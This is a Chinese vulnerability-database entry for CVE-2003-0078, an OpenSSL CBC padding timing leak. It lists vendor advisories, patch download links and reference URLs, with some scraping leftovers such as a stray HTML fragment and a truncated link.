漏洞信息详情
OpenSSL CBC错误信息泄露漏洞
- CNNVD编号:CNNVD-200303-024
- 危害等级: 低危
- CVE编号: CVE-2003-0078
- 漏洞类型: 设计错误
- 发布时间: 2003-03-03
- 威胁类型: 远程
- 更新时间: 2005-10-12
- 厂 商: openbsd
- 漏洞来源: Discovery credited...
漏洞简介
OpenSSL 0.9.7a之前的版本和0.9.6i之前的0.9.6版本中s3_pkt.c的ssl3_get_record如果使用不正确分组密码进行填充,将不执行MAC计算,可以导致信息泄露(时序差异),该漏洞可能更容易导致凭借区分填充和MAC检验错误差别的加密攻击,并且可能导致原始明文被提取,也称为“Vaudenay timing attack”。
漏洞公告
It is reported that certain versions of Computer Associates eTrust Security Command Center are prone to this vulnerability. Customers are advised to contact the vendor for further information pertaining to obtaining and applying appropriate updates. Hewlett-Packard has released an advisory (HPSBUX0309-280), which contains fix information to address this issue in J2SE and jsSE. Customers are advised to upgrade as soon as possible. Further information regarding obtaining and applying fixes can be found in the referenced advisory. NetBSD has released an advisory (2003-001) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. Administrators and users are advised to upgrade to version 0.9.6i or 0.9.7a. OpenPKG has released upgrade RPMs. Conectiva has released an advisory (CLA-2003:570) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. Debian has released an advisory (DSA 253-1) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. Gentoo Linux have recommended that users who are running 'dev-libs/openssl' upgrade to 'openssl-0.9.6i' or 'openssl-0.9.7a' as follows: emerge sync emerge -u openssl emerge clean Mandrake has released an advisory (MDKSA-2003:020) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. Trustix has released an advisory (TSLSA-2003-0005) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. EnGarde has released an advisory ([ESA-20030220-005) which addresses this issue. Fix details may be found in the attached advisory. FreeBSD has released an updated Security Advisory. Users are advised to apply the new patches or to upgrade systems via CVS. Further information is available in the referenced advisory. OpenBSD has released security patches which address this issue. Further information is available from the OpenBSD eratta pages. SuSE has released an advisory (SuSE-SA:2003:011) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple has released an advisory which contains a fix for this issue. Further information is available from the CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Security Update page. Red Hat Linux has released an advisory (RHSA-2003:062-11) containing fixes. Information about obtaining and applying fixes are available in the referenced advisory. Sun has released updated versions of the affected products to address this issue. Sun has also released an alert stating that this issue has been addressed in the latest release of jsSE, SDK, and JRE. HP has released advisory HPSBUX0303-248 (rev. 1) to address this issue. HP has released advisory HPSBUX0303-248 (rev. 2) to address this issue. Oracle has released an advisory and patches to address this issue. User are advised to obtain patches from the Oracle metalink site listed in references. Fixes available: OpenBSD OpenBSD 3.2
- OpenBSD 007_ssl.patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/007_ssl.patch
- Sun RaQ4-All-Security-2.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-All-Security-2.0. 1-16343.pkg
- Sun RaQ550-All-Security-0.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq550/all/RaQ550-All-Security- 0.0.1-16343.pkg
- Sun RaQ550-All-Security-0.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq550/all/RaQ550-All-Security- 0.0.1-16343.pkg
- Sun RaQXTR-All-Security-1.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raqxtr/eng/RaQXTR-All-Security- 1.0.1-16343.pkg
- Sun Qube3-All-Security-4.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16343.pkg
- OpenBSD 021_ssl.patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/021_ssl.patch
- OpenSSL Project openssl-0.9.6i.tar.gzOpenSSL 0.9.6i upgrade. http://www.openssl.org/source/openssl-0.9.6i.tar.gz
- OpenSSL Project openssl-0.9.6i.tar.gzOpenSSL 0.9.6i upgrade. http://www.openssl.org/source/openssl-0.9.6i.tar.gz
- Mandrake openssl-0.9.5a-9.4mdk.i586.rpmMandrake Linux 7.2 http://www.mandrakesecure.net/en/ftp.php
- Mandrake openssl-devel-0.9.5a-9.4mdk.i586.rpmMandrake Linux 7.2 http://www.mandrakesecure.net/en/ftp.php
- OpenSSL Project openssl-0.9.6i.tar.gzOpenSSL 0.9.6i upgrade. http://www.openssl.org/source/openssl-0.9.6i.tar.gz
- OpenSSL Project openssl-0.9.6i.tar.gzOpenSSL 0.9.6i upgrade. http://www.openssl.org/source/openssl-0.9.6i.tar.gz
- OpenSSL Project openssl-0.9.6i.tar.gzOpenSSL 0.9.6i upgrade. http://www.openssl.org/source/openssl-0.9.6i.tar.gz
- Conectiva openssl-0.9.6-4U60_5cl.i386.rpmConectiva Linux Version 6.0 ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-0.9.6-4U60_5cl.i3 86.rpm
- Conectiva openssl-0.9.6-4U60_5cl.src.rpmConectiva Linux Version 6.0 ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssl-0.9.6-4U60_5cl.s rc.rpm
- Conectiva openssl-0.9.6c-2U80_4cl.i386.rpmConectiva Linux Version 8.0 ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-0.9.6c-2U80_4cl.i38 6.rpm
- Conectiva openssl-0.9.6c-2U80_4cl.src.rpmConectiva Linux Version 8.0 ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssl-0.9.6c-2U80_4cl.sr c.rpm
-
Conectiva openssl-devel-0.9.6-4U60_5cl.i386.rpmConectiva Linux Version 6.0
ftp://atualizacoes.conecti
参考网址
来源: www.openssl.org 链接:http://www.openssl.org/news/secadv_20030219.txt 来源: BUGTRAQ 名称: 20030219 [OpenPKG-SA-2003.013] OpenPKG Security Advisory (openssl) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104568426824439&w=2 来源: XF 名称: ssl-cbc-information-leak(11369) 链接:http://www.iss.net/security_center/static/11369.php 来源: DEBIAN 名称: DSA-253 链接:http://www.debian.org/security/2003/dsa-253 来源: TRUSTIX 名称: 2003-0005 链接:http://www.trustix.org/errata/2003/0005 来源: BID 名称: 6884 链接:http://www.securityfocus.com/bid/6884 来源: REDHAT 名称: RHSA-2003:205 链接:http://www.redhat.com/support/errata/RHSA-2003-205.HTML 来源: REDHAT 名称: RHSA-2003:104 链接:http://www.redhat.com/support/errata/RHSA-2003-104.HTML 来源: REDHAT 名称: RHSA-2003:082 链接:http://www.redhat.com/support/errata/RHSA-2003-082.HTML 来源: REDHAT 名称: RHSA-2003:063 链接:http://www.redhat.com/support/errata/RHSA-2003-063.HTML 来源: REDHAT 名称: RHSA-2003:062 链接:http://www.redhat.com/support/errata/RHSA-2003-062.HTML 来源: OSVDB 名称: 3945 链接:http://www.osvdb.org/3945 来源: MANDRAKE 名称: MDKSA-2003:020 链接:http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:020 来源: ENGARDE 名称: ESA-20030220-005 链接:http://www.linuxsecurity.com/advisories/engarde_advisory-2874.HTML 来源: CIAC 名称: N-051 链接:http://www.ciac.org/ciac/bulletins/n-051.sHTML 来源: GENTOO 名称: GLSA-200302-10 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104577183206905&w=2 来源: BUGTRAQ 名称: 20030219 OpenSSL 0.9.7a and 0.9.6i released 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104567627211904&w=2 来源: CONECTIVA 名称: CLSA-2003:570 链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000570 来源: SGI 名称: 20030501-01-I 链接:ftp://patches.sgi.com/support/free/security/advisories/20030501-01-I 来源: NETBSD 名称: NetBSD-SA2003-001 链接:ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-001.txt.asc
受影响实体
- Openbsd Openbsd:3.2
- Openbsd Openbsd:3.1
补丁
暂无
评论